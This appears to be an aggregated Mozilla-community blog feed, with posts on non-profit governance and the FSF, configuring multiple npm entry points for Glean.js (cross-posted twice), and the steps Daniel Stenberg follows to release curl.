In early April, it was reported that there had been a Facebook data leak, raising alarms among Facebook account holders. Half a billion Facebook accounts were impacted. The dataset is … Read more

The post You’ve been scraped, the Facebook data leak explained appeared first on The Firefox Frontier.

The Firefox FrontierMozilla Explains: SIM swapping

These days, smartphones are in just about everyone’s pocket. We use them for entertainment, sending messages, storing notes, taking photos, transferring money and even making the odd phone call. Our … Read more

The post Mozilla Explains: SIM swapping appeared first on The Firefox Frontier.

Luis VillaGoverning Values-Centered Tech Non-Profits; or, The Route Not Taken by FSF

A few weeks ago, I interviewed my friend Katherine Maher on leading a non-profit under some of the biggest challenges an org can face: accusations of assault by leadership, and a growing gap between mission and reality on the ground.

We did the interview at the Free Software Foundation’s Libre Planet conference. We chose that forum because I was hopeful that the FSF’s staff, board, and membership might want to learn about how other orgs had risen to challenges like those faced by FSF after Richard Stallman’s departure in 2019. I, like many others in this space, have a soft spot for the FSF and want it to succeed. And the fact my talk was accepted gave me further hope.

Unfortunately, the next day it was announced at the same conference that Stallman would rejoin the FSF board. This made clear that the existing board tolerated Stallman’s terrible behavior towards others, and endorsed his failed leadership—a classic case of non-profit founder syndrome.

While the board’s action made the talk less timely, much of the talk is still, hopefully, relevant to any value-centered tech non-profit that is grappling with executive misbehavior and/or simply keeping up with a changing tech world. As a result, I’ve decided to present here some excerpts from our interview. They have been lightly edited, emphasized, and contextualized. The full transcript is here.

Sunlight Foundation: harassment, culture, and leadership

In the first part of our conversation, we spoke about Katherine’s tenure on the board of the Sunlight Foundation. Shortly after she joined, Huffington Post reported on bullying, harassment, and rape accusations against a key member of Sunlight’s leadership team.

[I had] worked for a long time with the Sunlight Foundation and very much valued what they’d given to the transparency and open data open government world. I … ended up on a board that was meant to help the organization reinvent what its future would be.

I think I was on the board for probably no more than three months, when an article landed in the Huffington Post that went back 10 years looking at … a culture of exclusion and harassment, but also … credible [accusations] of sexual assault.

And so as a board … we realized very quickly that there was no possible path forward without really looking at our past, where we had come from, what that had done in terms of the culture of the institution, but also the culture of the broader open government space.


Practical impacts of harassment

Sunlight’s board saw immediately that an org cannot effectively grapple with a global, ethical technological future if the org’s leadership cannot grapple with its own culture of harassment. Some of the pragmatic reasons for this included:

The [Huffington Post] article detailed a culture of heavy drinking and harassment, intimidation.

What does that mean for an organization that is attempting to do work in sort of a progressive space of open government and transparency? How do you square those values from an institutional mission standpoint? That’s one [pragmatic] question.

Another question is, as an organization that’s trying to hire, what does this mean for your employer brand? How can you even be an organization that’s competitive [for hiring] if you’ve got this culture out there on the books?

And then the third pragmatic question is … [w]hat does this mean for like our funding, our funders, and the relationships that we have with other partner institutions who may want to use the tools?


FSF suffers from similar pragmatic problems—problems that absolutely can’t be separated from the founder’s inability to treat all people as full human beings worthy of his respect. (Both of the tweets below lead to detailed threads from former FSF employees.)

Since the announcement of Stallman’s return, all top leadership of the organization have resigned, and former employees have detailed how the FSF staff has (for over a decade) had to deal with Richard’s unpleasant behavior, leading to morale problems, turnover, and even unionization explicitly to deal with RMS.

And as for funding, compare the 2018 sponsor list with the current, much shorter sponsor list.

So it seems undeniable: building a horrible culture has pragmatic impacts on an org’s ability to espouse its values.

Values and harassment

Of course, a values-centered organization should be willing to anger sponsors if it is important for their values. But at Sunlight, it was also clear that dealing with the culture of harassment was relevant to their values, and the new board had to ask hard questions about that:

The values questions, which … are just as important, were… what does this mean to be an organization that focuses on transparency in an environment in which we’ve not been transparent about our past?

What does it mean to be an institution that [has] progressive values in the sense of inclusion, a recognition that participation is critically important? … Is everyone able to participate? How can we square that with the institution that are meant to be?

And what do we do to think about justice and redress for (primarily the women) who are subjected to this culture[?]


Unlike Sunlight, FSF is not about transparency, per se, but RMS at his best has always been very strong about how freedom had to be for everyone. FSF is an inherently political project! One can’t advocate for the rights of everyone if, simultaneously, one treats staff disposably and women as objects to be licked without their consent, and half the population (women) responds by actively avoiding the leadership of the “movement”.

So, in this situation, what is a board to do? In Sunlight’s case:

[Myself and fellow board member Zoe Reiter] decided that this was a no brainer, we had to do an external investigation.

The challenges of doing this… were pretty tough. [W]e reached out to everyone who’d been involved with the organization we also put not just as employees but also trying to find people who’ve been involved in transparency camps and other sorts of initiatives that Sunlight had had run.

We put out calls for participation on our blog; we hired a third party legal firm to do investigation and interviews with people who had been affected.

We were very open in the way that we thought about who should be included in that—not just employees, but anyone who had something that they wanted to raise. That produced a report that we then published to the general public, really trying to account for some of the things that have been found.


The report Katherine mentions is available in two parts (results, recommendations) and is quite short (nine pages total).

While most of the report is quite specific to the Sunlight Foundation’s specific situation, the FSF board should particularly have read page 3 of the recommendations: “Instituting Board Governance Best Practices”. Among other recommendations relevant to many tech non-profits (not just FSF!), the report says Sunlight should “institute term limits” and “commit to a concerted effort to recruit new members to grow the Board and its capacity”.

Who can investigate a culture? When?

Katherine noted that self-scrutiny is not just something for large orgs:

[W]hen we published this report, part of what we were hoping for was that … we wanted other organizations to be able to approach this in similar challenges with a little bit of a blueprint for how one might do it. Particularly small orgs.

There were four of us on the board. Sunlight is a small organization—15 people. The idea that an even smaller organizations don’t have the resources to do it was something that we wanted to stand against and say, actually, this is something that every and all organizations should be able to take on regardless of the resources available to them.


It’s also important to note that the need for critical self scrutiny is not something that “expires” if not undertaken immediately—communities are larger, and longer-lived, than the relevant staff or boards, so even if the moment seems to be in the relatively distant past, an investigation can still be valuable for rebuilding organizational trust and effectiveness.

[D]espite the fact that this was 10 years ago, and none of us were on the board at this particular time, there is an accounting that we owe to the people who are part of this community, to the people who are our stakeholders in this work, to the people who use our tools, to the people who advocated, who donated, who went on to have careers who were shaped by this experience.

And I don’t just mean, folks who were in the space still—I mean, folks who were driven out of the space because of the experiences they had. There was an accountability that we owed. And I think it is important that we grappled with that, even if it was sort of an imperfect outcome.


Winding down Sunlight

As part of the conclusion of the report on culture and harassment, it was recommended that the Sunlight board “chart a new course forward” by developing a “comprehensive strategic plan”. As part of that effort, the board eventually decided to shut the organization down—not because of harassment, but because in many ways the organization had been so successful that it had outlived its purpose.

In Katherine’s words:

[T]he lesson isn’t that we shut down because there was a sexual assault allegation, and we investigated it. Absolutely not!

The lesson is that we shut down because as we went through this process of interrogating where we were, as an organization, and the culture that was part of the organization, there was a question of what would be required for us to shift the organization into a more inclusive space? And the answer is a lot of that work had already been done by the staff that were there…

But the other piece of it was, does it work? Does the world need a Sunlight right now? And the answer, I think, in in large part was not to do the same things that Sunlight had been doing. …

The organization spawned an entire community of practitioners that have gone on to do really great work in other spaces. And we felt as though that sort of national-level governmental transparency through tech wasn’t necessarily needed in the same way as it had been 15 years prior. And that’s okay, that’s a good thing.


We were careful to say at Libre Planet that I don’t think FSF needs to shut down because of RMS’s terrible behavior. But the reaction of many, many people to “RMS is back on the FSF board” is “who cares, FSF has been irrelevant for decades”.

That should be of great concern to the board. As I sometimes put it—free licenses have taken over the world, and despite that the overwhelming consensus is that open won and (as RMS himself would say) free lost. This undeniable fact reflects very badly on the organization whose nominal job it is to promote freedom. So it’s absolutely the case that shutting down FSF, and finding homes for its most important projects in organizations that do not suffer from deep governance issues, should be an option the current board and membership consider.

Which brings us to the second, more optimistic topic: how did Wikimedia react to a changing world? It wasn’t by shutting down! Instead, it was by building on what was already successful to make sure they were meeting their values—an option that is also still very much available to FSF.

Wikimedia: rethinking mission in a changing world

Wikimedia’s vision is simple: “A world in which every single human can freely share in the sum of all knowledge.” And yet, in Katherine’s telling, it was obvious that there was still a gap between the vision, the state of the world, and how the movement was executing.

We turned 15 in 2016 … and I was struck by the fact that when I joined the Wikimedia Foundation, in 2014, we had been building from a point of our founding, but we were not building toward something.

So we were building away from a established sort of identity … a free encyclopedia that anyone can edit; a grounding in what it means to be a part of open culture and free and libre software culture; an understanding that … But I didn’t know where we were going.

We had gotten really good at building an encyclopedia—imperfect! there’s much more to do!—but we knew that we were building an encyclopedia, and yet … to what end?

Because “a free world in which every single human being can share in the sum of all knowledge”—there’s a lot more than an encyclopedia there. And there’s all sorts of questions:

About what does “share” mean?

And what does the distribution of knowledge mean?

And what does “all knowledge” mean?

And who are all these people—“every single human being”? Because we’ve got like a billion and a half devices visiting our sites every month. But even if we’re generous, and say, that’s a billion people, that is not the entirety of the world’s population.


As we discussed during parts of the talk not excerpted here, usage by a billion people is not failure! And yet, it is not “every single human being”, and so WMF’s leadership decided to think strategically about that gap.

FSF’s leadership could be doing something similar—celebrating that GPL is one of the most widely-used legal documents in human history, while grappling with the reality that the preamble to the GPL is widely unheeded; celebrating that essentially every human with an internet connection interacts with GPL-licensed software (Linux) every day, while wrestling deeply with the fact that they’re not free in the way the organization hopes.

Some of the blame for that does in fact lie with capitalism and particular capitalists, but the leadership of the FSF must also reflect on their role in those failures if the organization is to effectively advance their mission in the 2020s and beyond.

Self-awareness for a successful, but incomplete, movement

With these big questions in mind, WMF embarked on a large project to create a roadmap, called the 2030 Strategy. (We talked extensively about “why 2030”, which I thought was interesting, but won’t quote here.)

WMF could have talked only to existing Wikimedians about this, but instead (consistent with their values) went more broadly, working along four different tracks. Katherine talked about the tracks in this part of our conversation:

We ran one that was a research track that was looking at where babies are born—demographics I mentioned earlier [e.g., expected massive population growth in Africa—omitted from this blog post but talked about in the full transcript.]

[Another] was who are our most experienced contributors, and what did they have to say about our projects? What do they know? What’s the historic understanding of our intention, our values, the core of who we are, what is it that motivates people to join this project, what makes our culture essential and important in the world?

Then, who are the people who are our external stakeholders, who maybe are not contributors in the sense of contributors to the code or contributors to the projects of content, but are the folks in the broader open tech world? Who are folks in the broad open culture world? Who are people who are in the education space? You know, stakeholders like that? “What’s the future of free knowledge” is what we basically asked them.

And then we went to folks that we had never met before. And we said, “Why don’t you use Wikipedia? What do you think of it? Why would it be valuable to you? Oh, you’ve never even heard of it. That’s so interesting. Tell us more about what you think of when you think of knowledge.” And we spent a lot of time thinking about what these… new readers need out of a project like Wikipedia. If you have no sort of structural construct for an encyclopedia, maybe there’s something entirely different that you need out of a project for free knowledge that has nothing to do with a reference—an archaic reference—to bound books on a bookshelf.


This approach, which focused not just on the existing community but on data, partners, and non-participants, has been extensively documented at 2030.wikimedia.org, and can serve as a model for any organization seeking to re-orient itself during a period of change—even if you don’t have the same resources as Wikimedia does.

Unfortunately, this is almost exactly the opposite of the approach FSF has taken. FSF has become almost infamously insulated from the broader tech community, in large part because of RMS’s terrible behavior towards others. (The list of conference organizers who regret allowing him to attend their events is very long.) Nevertheless, given its important role in the overall movement’s history, I suspect that good faith efforts to do this sort of multi-faceted outreach and research could work—if done after RMS is genuinely at arms-length.

Updating values, while staying true to the original mission

The Wikimedia strategy process led to a vision that extended and updated, rather than radically changed, Wikimedia’s strategic direction:

By 2030, Wikimedia will become the essential infrastructure of the ecosystem of free knowledge, and anyone who shares our vision will be able to join us.


In particular, the focus was around two pillars, which were explicitly additive to the traditional “encyclopedic” activities:

Knowledge equity, which is really around thinking about who’s been excluded and how we bring them in, and what are the structural barriers that enable that exclusion or created that exclusion, rather than just saying “we’re open and everyone can join us”. And how do we break down those barriers?

And knowledge as a service, which is without thinking about, yes, the technical components of what a service oriented architecture is, but how do we make knowledge useful beyond just being a website?


I specifically asked Katherine about how Wikimedia was adding to the original vision and mission because I think it’s important to understand that a healthy community can build on its past successes without obliterating or ignoring what has come before. Many in the GNU and FSF communities seem to worry that moving past RMS somehow means abandoning software freedom, which should not be the case. If anything, this should be an opportunity to re-commit to software freedom—in a way that is relevant and actionable given the state of the software industry in 2021.

A healthy community should be able to handle that discussion! And if the GNU and FSF communities cannot, it’s important for the FSF board to investigate why that is the case.

Checklists for values-centered tech boards

Finally, at two points in the conversation, we went into what questions an organization might ask itself that I think are deeply pertinent for not just the FSF but virtually any non-profit, tech or otherwise. I loved this part of the discussion because one could almost split it out into a checklist that any board member could use.

The first set of questions came in response to a question I asked about Wikidata, which did not exist 10 years ago but is now central to the strategic vision of knowledge infrastructure. I asked if Wikidata had been almost been “forced on” the movement by changes in the outside world, to which Katherine said:

Wikipedia … is a constant work in progress. And so our mission should be a constant work in progress too.

How do we align against a north star of our values—of what change we’re trying to effect in the world—while adapting our tactics, our structures, our governance, to the changing realities of the world?

And also continuously auditing ourselves to say, when we started, who, you know, was this serving a certain cohort? Does the model of serving that cohort still help us advance our vision today?

Do we need to structurally change ourselves in order to think about what comes next for our future? That’s an incredibly important thing, and also saying, maybe that thing that we started out doing, maybe there’s innovation out there in the world, maybe there are new opportunities that we can embrace, that will enable us to expand the impact that we have on the world, while also being able to stay true to our mission and ourselves.


And to close the conversation, I asked how one aligns the pragmatic and organizational values as a non-profit. Katherine responded that governance was central, with again a great set of questions all board members should ask themselves:

[Y]ou have to ask yourself, like, where does power sit on your board? Do you have a regenerative board that turns over so that you don’t have the same people there for decades?

Do you ensure that funders don’t have outsize weight on your board? I really dislike the practice of having funders on the board, I think it can be incredibly harmful, because it tends to perpetuate funder incentives, rather than, you know, mission incentives.

Do you think thoughtfully about the balance of power within those boards? And are there … clear bylaws and practices that enable healthy transitions, both in terms of sustaining institutional knowledge—so you want people who are around for a certain period of time, balanced against fresh perspective.

[W]hat are the structural safeguards you put in place to ensure that your board is both representative of your core community, but also the communities you seek to serve?

And then how do you interrogate on I think, a three year cycle? … So every three years we … are meant to go through a process of saying “what have we done in the past three, does this align?” and then on an annual basis, saying “how did we do against that three year plan?” So if I know in 15 years, we’re meant to be the essential infrastructure free knowledge, well what do we need to clean up in our house today to make sure we can actually get there?

And some of that stuff can be really basic. Like, do you have a functioning HR system? Do you have employee handbooks that protect your people? … Do you have a way of auditing your performance with your core audience or core stakeholders so that you know that the work of your institution is actually serving the mission?

And when you do that on an annual basis, you’re checking in with yourself on a three year basis, you’re saying this is like the next set of priorities. And it’s always in relation to that that higher vision. So I think every nonprofit can do that. Every size. Every scale.


The hard path ahead

The values that the FSF espouses are important and world-changing. And with the success of the GPL in the late 1990s, the FSF had a window of opportunity to become an ACLU of the internet, defending human rights in all their forms. Instead, under Stallman’s leadership, the organization has become estranged and isolated from the rest of the (flourishing!) digital liberties movement, and even from the rest of the software movement it was critical in creating.

This is not the way it had to be, nor the way it must be in the future. I hope our talk, and the resources I link to here, can help FSF and other value-centered tech non-profits grow and succeed in a world that badly needs them.

Beatriz RizentalThis Week in Glean: Publishing Glean.js or How I configured an npm package that has multiple entry points

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online).

All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.

A few weeks ago, it came the time for us to publish the first version of Glean.js in npm. (Yes, it has been published. Go take a look). In order to publish a package on npm, it is important to define the package entry points in the project’s package.json file. The entry point is the path to the file that should be loaded when users import a package through import Package from "package-name" or const Package = require("package-name").

My knowledge in this area went as far as “Hm, I think that main field in the package.json is where we define the entry point, right?”. Yes, I was right about that, but it turns out that was not enough for Glean.js.

The case of Glean.js

Glean.js is an implementation of Glean for Javascript environments. “Javascript environments” can mean multiple things: Node.js servers, Electron apps, websites, webextensions… The list goes on. To complicate things, Glean.js needs to access a bunch of platform specific APIs such as client side storage. We designed Glean.js in such a way that platform specific code is abstracted away under the Platform module, but when users import Glean.js all of this should be opaque.

So, we decided to provide a different package entry point per environment. This way, users can import the correct Glean for their environments and not care about internal architecture details e.g. import Glean from "glean/webext" imports the version of Glean that uses the web extensions implementaion of the Platform module.

The main field I mentioned above works when the package has one single entry point. What do you do when the package has multiple entry points?

The exports field

Lucky for us, starting from Node v12.7.0, Node recognizes the exports field in the package.json. This field accepts objects, so you can define mappings for all your package entry points.

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",

Another nice thing about the exports field, is that it denies access to any other entry point that is not defined in the exports map. Users can’t just import any file in your package anymore. Neat.

We must also define entry points for the type declarations of our package. Type declarations are necessary for users attempting to import the package in Typescript code. Glean.js is in Typescript, so it is easy enough for us to generate the type definitions, but we hit a wall when want to expose the generated definitions. From the “Publishing” page on Typecript’s documentation, this is the example provided:

  "name": "awesome",
  "author": "Vandelay Industries",
  "version": "1.0.0",
  "main": "./lib/main.js",
  "types": "./lib/main.d.ts"

Notice the types property. It works just like the main property. It does not accept an object, only a single entry point. And here we go again, what do you do when the package has multiple entry points?

The typesVersions workaround

This time I won’t say “Lucky for us Typescript has this other property starting from version…”. Turns out Typescript, as I am writing this blog post, doesn’t yet provide a way for packages to define multiple entry points for their types declarations.

Typescript lets packages define different types declarations per Typescript version, through the typesVersions property. This property does accept mappings of entry points to files. Smart people on the internet figured out, that we can use this property to define different types declarations for each of our package entry points. For more discussion on the topic, follow issue #33079.

Back to our previous example, type definitions mappings would look like this in our package.json:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

Alright, this is great. So we are done, right? Not yet.

Conditional exports

Our users can finally import our package in Javascript and Typescript and they have well defined entry points to choose from depending on the platform they are building for.

If they are building for Node.js though, they still might encounter issues. The default module system used by Node.js is commonjs. This is the one where we import packages by using the const Package = require("package") syntax and export modules by using the module.exports = Package syntax.

Newer versions of Node, also support the ECMAScript module system , also known as ESM. This is the offical Javascript module system and is the one where we import packages by using the import Package from "package" syntax and export modules by using the export default Package syntax.

Packages can provide different builds using each module system. In the exports field, Node.js allows packages to define different export paths to be imported depending on the module system a user is relying on. This feature is called “conditional exports”.

Assuming you have gone through all the setup involved in building a hybrid NPM module for both ESM and CommonJS (to learn more about how to do that, refer to this great blog post), this is how our example can be changed to use conditional exports:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": {
      "import": "path/to/entry/point/node.js",
      "require": "path/to/entry/point/node.cjs",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

The same change is not necessary for the ./webext entry point, because users building for browsers will need to use bundlers such as Webpack and Rollup, which have their own implementation of import/require statement resolutions and are able to import both ESM and CommonJS modules either out-of-the-box or through plugins.

Note that there is also no need to change the typesVersions value for ./node after this change.

Final considerations

Although the steps in this post look straightforward enough, it took me quite a while to figure out the correct way to configure the Glean.js’ entry points. I encountered many caveats along the way, such as the typesVersions workaround I mentioned above, but also:

  • In order to support ES6 modules, it is necessary to include the filename and extension in all internal package import statements. CommonJS infers the extension and the filename when it is not provided, but ES6 doesn’t. This get’s extra weird in Glean.js’ codebase, because Glean.js is in Typescript and all our import statements still have the .js extension. See more discussion about this on this issue and our commit with this change.
  • Webpack, below version 5, does not have support for the exports field and is not able to import a package that defined entry points only using this feature. See the Webpack 5 release notes.
  • Other exports conditions such as browser, production or development are mentioned in the Node.js documentation, but are ultimately ignored by Node.js. They are used by bundlers such as Webpack and Rollup. The Webpack documentation has a comprehensive list of all the conditions you can possibly include in that list, which bundler supports each, and whether Node.js supports it too.

Hope this guide is helpful to other people on the internet. Bye! 👋

Data@MozillaThis Week in Glean: Publishing Glean.js or “How I configured an npm package that has multiple entry points”

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

A few weeks ago, it came the time for us to publish the first version of Glean.js in npm. (Yes, it has been published. Go take a look). In order to publish a package on npm, it is important to define the package entry points in the project’s package.json file. The entry point is the path to the file that should be loaded when users import a package through import Package from "package-name" or const Package = require("package-name").

My knowledge in this area went as far as “Hm, I think that main field in the package.json is where we define the entry point, right?”. Yes, I was right about that, but it turns out that was not enough for Glean.js.

The case of Glean.js

Glean.js is an implementation of Glean for Javascript environments. “Javascript environments” can mean multiple things: Node.js servers, Electron apps, websites, webextensions… The list goes on. To complicate things, Glean.js needs to access a bunch of platform specific APIs such as client side storage. We designed Glean.js in such a way that platform specific code is abstracted away under the Platform module, but when users import Glean.js all of this should be opaque.

So, we decided to provide a different package entry point per environment. This way, users can import the correct Glean for their environments and not care about internal architecture details e.g. import Glean from "glean/webext" imports the version of Glean that uses the web extensions implementaion of the Platform module.

The main field I mentioned above works when the package has one single entry point. What do you do when the package has multiple entry points?

The exports field

Lucky for us, starting from Node v12.7.0, Node recognizes the exports field in the package.json. This field accepts objects, so you can define mappings for all your package entry points.

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",

Another nice thing about the exports field, is that it denies access to any other entry point that is not defined in the exports map. Users can’t just import any file in your package anymore. Neat.

We must also define entry points for the type declarations of our package. Type declarations are necessary for users attempting to import the package in Typescript code. Glean.js is in Typescript, so it is easy enough for us to generate the type definitions, but we hit a wall when want to expose the generated definitions. From the “Publishing” page on Typecript’s documentation, this is the example provided:

  "name": "awesome",
  "author": "Vandelay Industries",
  "version": "1.0.0",
  "main": "./lib/main.js",
  "types": "./lib/main.d.ts"

Notice the types property. It works just like the main property. It does not accept an object, only a single entry point. And here we go again, what do you do when the package has multiple entry points?

The typesVersions workaround

This time I won’t say “Lucky for us Typescript has this other property starting from version…”. Turns out Typescript, as I am writing this blog post, doesn’t yet provide a way for packages to define multiple entry points for their types declarations.

Typescript lets packages define different types declarations per Typescript version, through the typesVersions property. This property does accept mappings of entry points to files. Smart people on the internet figured out, that we can use this property to define different types declarations for each of our package entry points. For more discussion on the topic, follow issue #33079.

Back to our previous example, type definitions mappings would look like this in our package.json:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": "path/to/entry/point/node.js",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

Alright, this is great. So we are done, right? Not yet.

Conditional exports

Our users can finally import our package in Javascript and Typescript and they have well defined entry points to choose from depending on the platform they are building for.

If they are building for Node.js though, they still might encounter issues. The default module system used by Node.js is commonjs. This is the one where we import packages by using the const Package = require("package") syntax and export modules by using the module.exports = Package syntax.

Newer versions of Node, also support the ECMAScript module system , also known as ESM. This is the offical Javascript module system and is the one where we import packages by using the import Package from "package" syntax and export modules by using the export default Package syntax.

Packages can provide different builds using each module system. In the exports field, Node.js allows packages to define different export paths to be imported depending on the module system a user is relying on. This feature is called “conditional exports”.

Assuming you have gone through all the setup involved in building a hybrid NPM module for both ESM and CommonJS (to learn more about how to do that, refer to this great blog post), this is how our example can be changed to use conditional exports:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": {
      "import": "path/to/entry/point/node.js",
      "require": "path/to/entry/point/node.cjs",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

The same change is not necessary for the ./webext entry point, because users building for browsers will need to use bundlers such as Webpack and Rollup, which have their own implementation of import/require statement resolutions and are able to import both ESM and CommonJS modules either out-of-the-box or through plugins.

Note that there is also no need to change the typesVersions value for ./node after this change.

Final considerations

Although the steps in this post look straightforward enough, it took me quite a while to figure out the correct way to configure the Glean.js’ entry points. I encountered many caveats along the way, such as the typesVersions workaround I mentioned above, but also:

  • In order to support ES6 modules, it is necessary to include the filename and extension in all internal package import statements. CommonJS infers the extension and the filename when it is not provided, but ES6 doesn’t. This get’s extra weird in Glean.js’ codebase, because Glean.js is in Typescript and all our import statements still have the .js extension. See more discussion about this on this issue and our commit with this change.
  • Webpack, below version 5, does not have support for the exports field and is not able to import a package that defined entry points only using this feature. See the Webpack 5 release notes.
  • Other exports conditions such as browser, production or development are mentioned in the Node.js documentation, but are ultimately ignored by Node.js. They are used by bundlers such as Webpack and Rollup. The Webpack documentation has a comprehensive list of all the conditions you can possibly include in that list, which bundler supports each, and whether Node.js supports it too.

Hope this guide is helpful to other people on the internet. Bye! 👋

Daniel Stenbergsteps to release curl

I have a lot of different hats and roles in the curl project. One of them is “release manager” and in this post I’ve tried to write down pretty much all the steps I do to prepare and ship a curl release at the end of every release cycle in the project.

I’ve handled every curl release so far. All 198 of them. While the process certainly wasn’t this formal or extensive in the beginning, we’ve established a set of steps that have worked fine for us, that have been mostly unchanged for maybe ten years by now.

There’s nothing strange or magic about it. Just a process.

Release cycle

A typical cycle between two releases starts on a Wednesday when we do a release. We always release on Wednesdays. A complete and undisturbed release cycle is always exactly 8 weeks (56 days).

The cycle starts with us taking the remainder of the release week to observe the incoming reports to judge if there’s a need for a follow-up patch release or if we can open up for merging features again.

If there was no significant enough problems found in the first few days, we open the “feature window” again on the Monday following the release. Having the feature window open means that we accept new changes and new features getting merged – if anyone submits such a pull-request in a shape ready for merge.

If there was an issue found to be important enough to a warrant a patch release, we instead schedule a new release date and make the coming cycle really short and without opening the feature window. There aren’t any set rules or guidelines to help us judge this. We play this by ear and go with what feels like the right action for our users.

Closing the feature window

When there’s exactly 4 weeks left to the pending release we close the feature window. This gives us a period where we only merge bug-fixes and all features are put on hold until the window opens again. 28 days to polish off all sharp corners and fix as many problems we can for the coming release.

Contributors can still submit pull-requests for new stuff and we can review them and polish them, but they will not be merged until the window is reopened. This period is for focusing on bug-fixes.

We have a web page that shows the feature window’s status and I email the mailing list when the status changes.

Slow down

A few days before the pending release we try to slow down and only merge important bug-fixes and maybe hold off the less important ones to reduce risk.

This is a good time to run our copyright.pl script that checks copyright ranges of all files in the git repository and makes sure they are in sync with recent changes. We only update the copyright year ranges of files that we actually changed this year.

Security fixes

If we have pending security fixes to announce in the coming release, those have been worked on in private by the curl security team. Since all our test infrastructure is public we merge our security fixes into the main source code and push them approximately 48 hours before the planned release.

These 48 hours are necessary for CI and automatic build jobs to verify the fixes and still give us time to react to problems this process reveals and the subsequent updates and rinse-repeats etc until everyone is happy. All this testing is done using public code and open infrastructure, which is why we need the code to be pushed for this to work.

At this time we also have detailed security advisories written for each vulnerability that are ready to get published. The advisories are stored in the website repository and have been polished by the curl security team and the reporters of the issues.

Release notes

The release notes for the pending release is a document that we keep in sync and updated at a regular interval so that users have a decent idea of what to expect in the coming release – at all times.

It is basically a matter of running the release-notes.pl script, clean up the list of bug-fixes, then the run contributors.sh script and update the list of contributors to the release so far and then commit it with the proper commit message.

At release-time, the work on the release notes is no different than the regular maintenance of it. Make sure it reflects what’s been done in the code since the previous release.


When everything is committed to git for the release, I tag the repository. The name and format of the tag is set in stone for historical reasons to be curl-[version] where [version] is the version number with underscores instead of periods. Like curl-7_76_0 for curl 7.76.0. I sign and annotate the tag using git.

git push

Make sure everything is pushed. Git needs the --tags option to push the new tag.


Our script that builds a full release tarball is called mktgz. This script is also used to produce the daily snapshots of curl that we provide and we verify that builds using such tarballs work in the CI.

The output from mktgz is four tarballs. They’re all the exact same content, just different compressions and archive formats: gzip, bz2, xz and zip.

The output from this script is the generated release at the point in time of the git tag. All the tarballs contents are then not found (identically) in git (or GitHub). The release is the output of this script.


I GPG sign the four tarballs and upload them to the curl site’s download directory. Uploading them takes just a few seconds.

The actual upload of the packages doesn’t actually update anything on the site and they will not be published just because of this. It needs a little more on the website end.

Edit release on GitHub

Lots of users get their release off GitHub directly so I make sure to edit the tag there to make it a release and I upload the tarballs there. By providing the release tarballs there I hope that I lower the frequency of users downloading the state of the git repo from the tag assuming that’s the same thing as a release.

As mentioned above: a true curl release is a signed tarball made with maketgz.

Web site

The curl website at curl.se is managed with the curl-www git repository. The site automatically updates and syncs with the latest git contents.

To get a release done and appear on the website, I update three files on the site. They’re fairly easy to handle:

  1. Makefile contains the latest release version number, release date and the planned date for the next release.
  2. _changes.html is the changelog of changes done per release. The secret to updating this is to build the web site locally and use the generated file dev/release-notes.gen to insert into the changelog. It’s mostly a copy and paste. That generated file is built from the RELEASE-NOTES that’s present in the source code repo.
  3. _newslog.html is used for the “latest news” page on the site. Just mention the new release and link to details.

If there are security advisories for this release, they are also committed to the docs/ directory using their CVE names according to our established standard.


I tag the website repository as well, using the exact same tag name as I did in the source code repository, just to allow us to later get an idea of the shape of the site at the time of this particular release. Even if we don’t really “release” the website.

git push

Using the --tags option again I push the updates to the website with git.

The website, being automatically synced with the git repository, will then very soon get the news about the release and rebuild the necessary pages on the site and the new release is then out and shown to the world. At least those who saw the git activity and visitors of the website. See also the curl website infrastructure.

Now it’s time to share the news to the world via some more channels.

Post blog

I start working on the release blog post perhaps a week before the release. I then work on it on and off and when the release is getting closer I make sure to tie all loose ends and finalize it.

Recently I’ve also created a new “release image” for the particular curl release I do so if I feel inspired I do that too. I’m not really skilled or talented enough for that, but I like the idea of having a picture for this unique release – to use in the blog post and elsewhere when talking about this version. Even if that’s a very ephemeral thing as this specific version very soon appears in my rear view mirror only…

Email announcements

Perhaps the most important release announcement is done per email. I inform curl-users, curl-library and curl-announce about it.

If there are security advisories to announce in association with the release, those are also sent individually to the same mailing lists and the oss-security mailing list.

Tweet about it

I’m fortunate enough to have a lot of twitter friends and followers so I also make sure they get to know about the new release. Follow me there to get future tweets.

Video presentation

At the day of the release I do a live-streamed presentation of it on twitch.

I create a small slide set and go through basically the same things I mention in my release blog post: security issues, new features and a look at some bug-fixes we did for this release that I find interesting or note-worthy.

Once streamed, recorded and published on YouTube. I update my release blog post and embed the presentation there and I add a link to the presentation on the changelog page on the curl website.

A post-release relief

Immediately after having done all the steps for a release. When its uploaded, published, announced, discussed and presented I can take a moment to lean back and enjoy the moment.

I then often experience a sense of calmness and relaxation. I get an extra cup of coffee, put my feet up and just go… aaaah. Before any new bugs has arrived, when the slate is still clean so to speak. That’s a mighty fine moment and I cherish it.

